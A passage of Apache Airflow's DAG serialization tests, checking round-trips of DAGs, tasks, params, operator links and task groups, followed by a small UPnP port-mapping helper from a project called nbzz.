"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@parameterized.expand(
[
(None, None, NullTimetable()),
("@weekly", "@weekly", cron_timetable("0 0 * * 0")),
("@once", "@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
timedelta(days=1),
delta_timetable(timedelta(days=1)),
),
]
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_schedule_interval,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.schedule_interval == expected_schedule_interval
assert dag.timetable == expected_timetable
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator, make sure the deps is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
Tests serialize_task_group, make sure the list is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@parameterized.expand(
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@parameterized.expand(
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@parameterized.expand(
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
]
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "nbzz", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run nbzz, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
